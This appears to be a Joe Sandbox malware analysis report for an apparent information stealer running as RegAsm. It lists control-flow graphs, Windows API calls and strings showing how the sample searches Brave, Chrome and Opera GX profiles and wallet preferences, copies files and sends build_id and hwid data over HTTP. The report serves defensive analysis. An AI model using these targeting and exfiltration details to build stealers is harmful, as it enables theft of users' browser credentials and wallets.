                                                                                                                                                                                                                                                                                                  control_flow_graph 1443 40d320-40d3e2 call 40fe20 call 40ff50 call 40ffe0 call 40ff00 call 40fea0 * 2 call 40fe20 * 2 call 4100c0 FindFirstFileA 1462 40d3e4-40d418 call 40fea0 * 4 1443->1462 1463 40d41d-40d429 1443->1463 1488 40df6a-40dfb5 call 40fea0 * 5 1462->1488 1465 40d430-40d444 StrCmpCA 1463->1465 1467 40df19-40df29 FindNextFileA 1465->1467 1468 40d44a-40d45e StrCmpCA 1465->1468 1467->1465 1470 40df2f-40df66 FindClose call 40fea0 * 4 1467->1470 1468->1467 1471 40d464-40d4f0 call 40feb0 call 40ff50 call 40ffe0 * 2 call 40ff00 call 40fea0 * 3 1468->1471 1470->1488 1512 40d656-40d6ed call 40ffe0 * 4 call 40ff00 call 40fea0 * 3 1471->1512 1513 40d4f6-40d50c call 4100c0 StrCmpCA 1471->1513 1562 40d6f3-40d712 call 40fea0 call 4100c0 StrCmpCA 1512->1562 1518 40d512-40d5af call 40ffe0 * 4 call 40ff00 call 40fea0 * 3 1513->1518 1519 40d5b4-40d651 call 40ffe0 * 4 call 40ff00 call 40fea0 * 3 1513->1519 1518->1562 1519->1562 1571 40d8e8-40d8fe StrCmpCA 1562->1571 1572 40d718-40d72c StrCmpCA 1562->1572 1573 40d900-40d95c call 401120 call 40fe60 * 3 call 40cf10 1571->1573 1574 40d96c-40d981 StrCmpCA 1571->1574 1572->1571 1575 40d732-40d863 call 40fe20 call 411450 call 40ffe0 call 40ff50 call 40ff00 call 40fea0 * 3 call 4100c0 * 2 call 40fe20 call 40ffe0 * 2 call 40ff00 call 40fea0 * 2 call 40fe60 call 406e80 1572->1575 1630 40d961-40d967 1573->1630 1576 40d983-40d99b call 4100c0 StrCmpCA 1574->1576 1577 40d9f8-40da13 call 40fe60 call 411610 1574->1577 1757 40d8b1-40d8e3 call 4100c0 call 410070 call 4100c0 call 40fea0 * 2 1575->1757 1758 40d865-40d8ac call 40fe60 call 401120 call 4153e0 call 40fea0 1575->1758 1590 40d9a1-40d9a5 1576->1590 1591 40de8b-40de92 1576->1591 1601 40da15-40da19 1577->1601 1602 40da8f-40daa4 StrCmpCA 1577->1602 1590->1591 1597 40d9ab-40d9f6 call 401120 call 40fe60 * 2 1590->1597 1595 40de94-40defb call 40fe60 * 2 call 40fe20 call 401120 call 40d320 1591->1595 1596 40df06-40df16 call 410070 * 2 1591->1596 1660 40df00 1595->1660 1596->1467 1648 40da6d-40da7f call 40fe60 call 407440 1597->1648 1601->1591 1610 40da1f-40da6a call 401120 call 40fe60 call 40fe20 1601->1610 1606 40daaa-40db5b call 40fe20 call 40ffe0 call 40ff00 call 40fea0 call 411450 call 40ff50 call 40ff00 call 40fea0 * 2 call 4100c0 * 2 CopyFileA 1602->1606 1607 40dccc-40dce1 StrCmpCA 1602->1607 1707 40db61-40dc2b call 401120 call 40fe60 * 3 call 407bd0 call 401120 call 40fe60 * 3 call 408730 1606->1707 1708 40dc2d 1606->1708 1607->1591 1616 40dce7-40dd98 call 40fe20 call 40ffe0 call 40ff00 call 40fea0 call 411450 call 40ff50 call 40ff00 call 40fea0 * 2 call 4100c0 * 2 CopyFileA 1607->1616 1610->1648 1712 40de68-40de7a call 4100c0 DeleteFileA call 410070 1616->1712 1713 40dd9e-40ddfb call 401120 call 40fe60 * 3 call 407fc0 1616->1713 1630->1591 1665 40da84-40da8a 1648->1665 1660->1596 1665->1591 1715 40dc33-40dc49 call 4100c0 StrCmpCA 1707->1715 1708->1715 1732 40de7f 1712->1732 1766 40de00-40de62 call 401120 call 40fe60 * 3 call 408330 1713->1766 1727 40dc4b-40dca7 call 401120 call 40fe60 * 3 call 408dc0 1715->1727 1728 40dcad-40dcbf call 4100c0 DeleteFileA call 410070 1715->1728 1727->1728 1750 40dcc4-40dcc7 1728->1750 1739 40de82-40de86 call 40fea0 1732->1739 1739->1591 1750->1739 1757->1571 1758->1757 1766->1712
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,01562F00,?), ref: 0041001C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00426A8A,00426A87,00000000,?,00426BC8,?,?,00426A86,?,00000000,00000005), ref: 0040D3D4
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00426BCC), ref: 0040D43C
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00426BD0), ref: 0040D456
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,Opera GX,00000000,?,?,?,00426BD4,?,?,00426A8B), ref: 0040D504
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                                                                                                                                                                                                                                  • String ID: Brave$E$Google Chrome$Opera GX$Preferences$\BraveWallet\Preferences$p@$p@E
                                                                                                                                                                                                                                                                                                  • API String ID: 2567437900-2467990661
                                                                                                                                                                                                                                                                                                  • Opcode ID: a4a659c085f4578309f57611426e91475dc4e9c324af32b8baff43b8d756086c
                                                                                                                                                                                                                                                                                                  • Instruction ID: ae1f48a692d5d46922722a01a953bd659f061a71a50a6572180acf0b0686347d
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a4a659c085f4578309f57611426e91475dc4e9c324af32b8baff43b8d756086c
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E0828270900248EADB14EBA5D945BDDBBB96F19304F5080BEF505732D2DB782B4CCBA6
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00404500 Relevance: 37.3, APIs: 13, Strings: 8, Instructions: 537networkfilestringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 2438 404500-4045f2 call 40fe60 call 404430 call 40fe20 * 5 call 4100c0 InternetOpenA StrCmpCA 2455 4045f4 2438->2455 2456 4045fb-4045fd 2438->2456 2455->2456 2457 404603-404781 call 411450 call 40ff50 call 40ff00 call 40fea0 * 2 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ff50 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff50 call 40ff00 call 40fea0 * 2 InternetConnectA 2456->2457 2458 404b68-404bf7 InternetCloseHandle call 411380 * 2 call 40fea0 * 8 2456->2458 2457->2458 2529 404787-4047bf HttpOpenRequestA 2457->2529 2530 4047c5-4047c9 2529->2530 2531 404b5b-404b65 InternetCloseHandle 2529->2531 2532 4047e1-404af3 call 40ffe0 call 40ff00 call 40fea0 call 40ff50 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ff50 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ff50 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ff50 call 40ff00 call 40fea0 call 40fe20 call 40ff50 * 2 call 40ff00 call 40fea0 * 2 call 4100c0 lstrlen call 4100c0 * 2 lstrlen call 4100c0 HttpSendRequestA InternetReadFile 2530->2532 2533 4047cb-4047db InternetSetOptionA 2530->2533 2531->2458 2644 404af5-404afa 2532->2644 2645 404b49-404b56 InternetCloseHandle call 40fea0 2532->2645 2533->2532 2644->2645 2646 404afc-404b47 call 40ffe0 call 40ff00 call 40fea0 InternetReadFile 2644->2646 2645->2531 2646->2644 2646->2645
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 00404482
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 0040448F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 0040449C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404430: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044B6
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404430: InternetCrackUrlA.WININET(00000000,00000000), ref: 004044C6
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004045CA
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0156F958,?,?,?,?,?,?,00000000), ref: 004045EA
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404774
                                                                                                                                                                                                                                                                                                  • HttpOpenRequestA.WININET(00000000,0156F8F8,?,015724D8,00000000,00000000,-00400100,00000000), ref: 004047B5
                                                                                                                                                                                                                                                                                                  • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 004047DB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,01562F00,?), ref: 0041001C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,00000000,0041FDC9,?,?,?,00426885,00000000,0041FDC9,?,00000000,0041FDC9,",00000000,0041FDC9,build_id), ref: 00404AAA
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00404AC3
                                                                                                                                                                                                                                                                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404AD4
                                                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,000007CF,00000000), ref: 00404AEB
                                                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,00000000,000007CF,00000000), ref: 00404B3F
                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00404B4A
                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 00404B5F
                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00404B69
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Internet$lstrcpy$lstrlen$CloseHandle$FileHttpOpenReadRequestlstrcat$ConnectCrackOptionSend
                                                                                                                                                                                                                                                                                                  • String ID: !$"$"$------$------$------$build_id$hwid
                                                                                                                                                                                                                                                                                                  • API String ID: 1585128682-3346224549
                                                                                                                                                                                                                                                                                                  • Opcode ID: 9d778b4aa2deb08cd358f78b548b6816cd00b3c1542e7757b00d46b6ee996e33
                                                                                                                                                                                                                                                                                                  • Instruction ID: 5fc5c06e662f0cc56ec579075a690d6072dddc9a0b5f03a20420b071163eae1a
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9d778b4aa2deb08cd358f78b548b6816cd00b3c1542e7757b00d46b6ee996e33
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4E222C71801149EADB15E7E4C952BEEBBB8AF15304F54407EE601731D2DF782B0CCAA9
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C7F35A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294stringtimeCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 2654 6c7f35a0-6c7f35be 2655 6c7f38e9-6c7f38fb call 6c82b320 2654->2655 2656 6c7f35c4-6c7f35ed InitializeCriticalSectionAndSpinCount getenv 2654->2656 2657 6c7f38fc-6c7f390c strcmp 2656->2657 2658 6c7f35f3-6c7f35f5 2656->2658 2657->2658 2662 6c7f3912-6c7f3922 strcmp 2657->2662 2660 6c7f35f8-6c7f3614 QueryPerformanceFrequency 2658->2660 2665 6c7f374f-6c7f3756 2660->2665 2666 6c7f361a-6c7f361c 2660->2666 2663 6c7f398a-6c7f398c 2662->2663 2664 6c7f3924-6c7f3932 2662->2664 2663->2660 2667 6c7f3938 2664->2667 2668 6c7f3622-6c7f364a _strnicmp 2664->2668 2670 6c7f396e-6c7f3982 2665->2670 2671 6c7f375c-6c7f3768 2665->2671 2666->2668 2669 6c7f393d 2666->2669 2667->2665 2672 6c7f3944-6c7f3957 _strnicmp 2668->2672 2673 6c7f3650-6c7f365e 2668->2673 2669->2672 2670->2663 2674 6c7f376a-6c7f37a1 QueryPerformanceCounter EnterCriticalSection 2671->2674 2672->2673 2677 6c7f395d-6c7f395f 2672->2677 2673->2677 2678 6c7f3664-6c7f36a9 GetSystemTimeAdjustment 2673->2678 2675 6c7f37b3-6c7f37eb LeaveCriticalSection QueryPerformanceCounter EnterCriticalSection 2674->2675 2676 6c7f37a3-6c7f37b1 2674->2676 2679 6c7f37ed-6c7f37fa 2675->2679 2680 6c7f37fc-6c7f3839 LeaveCriticalSection 2675->2680 2676->2675 2681 6c7f36af-6c7f3749 call 6c82c110 2678->2681 2682 6c7f3964 2678->2682 2679->2680 2683 6c7f383b-6c7f3840 2680->2683 2684 6c7f3846-6c7f38ac call 6c82c110 2680->2684 2681->2665 2682->2670 2683->2674 2683->2684 2689 6c7f38b2-6c7f38ca 2684->2689 2690 6c7f38dd-6c7f38e3 2689->2690 2691 6c7f38cc-6c7f38db 2689->2691 2690->2655 2691->2689 2691->2690
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(6C87F688,00001000), ref: 6C7F35D5
                                                                                                                                                                                                                                                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C7F35E0
                                                                                                                                                                                                                                                                                                  • QueryPerformanceFrequency.KERNEL32(?), ref: 6C7F35FD
                                                                                                                                                                                                                                                                                                  • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C7F363F
                                                                                                                                                                                                                                                                                                  • GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C7F369F
                                                                                                                                                                                                                                                                                                  • __aulldiv.LIBCMT ref: 6C7F36E4
                                                                                                                                                                                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 6C7F3773
                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(6C87F688), ref: 6C7F377E
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(6C87F688), ref: 6C7F37BD
                                                                                                                                                                                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 6C7F37C4
                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(6C87F688), ref: 6C7F37CB
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(6C87F688), ref: 6C7F3801
                                                                                                                                                                                                                                                                                                  • __aulldiv.LIBCMT ref: 6C7F3883
                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C7F3902
                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C7F3918
                                                                                                                                                                                                                                                                                                  • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C7F394C
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
                                                                                                                                                                                                                                                                                                  • String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
                                                                                                                                                                                                                                                                                                  • API String ID: 301339242-3790311718
                                                                                                                                                                                                                                                                                                  • Opcode ID: 9c69248761cf03cd21d8b3cdd423637ec9c7653cf38654fcac85733468db0f37
                                                                                                                                                                                                                                                                                                  • Instruction ID: 93799502dac207e4181d460b23aebe17e0339bc22b5827bb3ccf07f66bb52ddc
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9c69248761cf03cd21d8b3cdd423637ec9c7653cf38654fcac85733468db0f37
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A4B19271B082209FDB29DF29C58865E7BF5BB99708F04893DE4A9D7750E7349801CBE2
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00417550 Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 198stringfileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcat$wsprintf$FileFindFirstMatchPathSpec
                                                                                                                                                                                                                                                                                                  • String ID: %s\%s$%s\%s$%s\*
                                                                                                                                                                                                                                                                                                  • API String ID: 3088078853-445461498
                                                                                                                                                                                                                                                                                                  • Opcode ID: 974bde728eb2ea4341a37141b836e6704171ada0683ba1d6d79cfbd9337a40f3
                                                                                                                                                                                                                                                                                                  • Instruction ID: 7ff546ba37fb225437adfdcfe4c42a1338871a9dd952cfc4639d17004bec3dc0
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 974bde728eb2ea4341a37141b836e6704171ada0683ba1d6d79cfbd9337a40f3
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9A71D4B5904218ABCB10DFA5DC45EEE7B79FB48700F00459DF619A3190DB789A48CFA4
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00411020 Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 166memorycomtimeCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CoInitializeEx.OLE32(00000000,00000000,?,00000000,?,Windows: ,00000000,?,004273F4,00000000,?,Work Dir: In memory,00000000,?,004273DC,00000000), ref: 00411043
                                                                                                                                                                                                                                                                                                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,?,Windows: ,00000000,?,004273F4), ref: 00411054
                                                                                                                                                                                                                                                                                                  • CoCreateInstance.OLE32(00427D04,00000000,00000001,00427C34,?,?,00000000,?,Windows: ,00000000,?,004273F4,00000000,?,Work Dir: In memory,00000000), ref: 0041106E
                                                                                                                                                                                                                                                                                                  • CoSetProxyBlanket.OLE32(004273DC,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,?,Windows: ,00000000,?,004273F4,00000000), ref: 004110A7
                                                                                                                                                                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00411106
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410F70: CoCreateInstance.OLE32(00427AB4,00000000,00000001,00427260,?,00000001,00000001,?,00000000,?,Windows: ,00000000,?,004273F4,00000000,?), ref: 00410F8D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410F70: SysAllocString.OLEAUT32(?), ref: 00410F9C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410F70: _wtoi64.MSVCRT ref: 00410FE2
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410F70: SysFreeString.OLEAUT32(?), ref: 00410FF8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410F70: SysFreeString.OLEAUT32(00000000), ref: 00410FFB
                                                                                                                                                                                                                                                                                                  • FileTimeToSystemTime.KERNEL32(004273F4,?,?,?,?,00000000,?,Windows: ,00000000,?,004273F4,00000000,?,Work Dir: In memory,00000000,?), ref: 00411140
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,?,Windows: ,00000000,?,004273F4,00000000,?,Work Dir: In memory,00000000,?), ref: 0041114C
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,00000000,?,Windows: ,00000000,?,004273F4,00000000,?,Work Dir: In memory,00000000,?,004273DC), ref: 00411153
                                                                                                                                                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00411197
                                                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 0041117F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
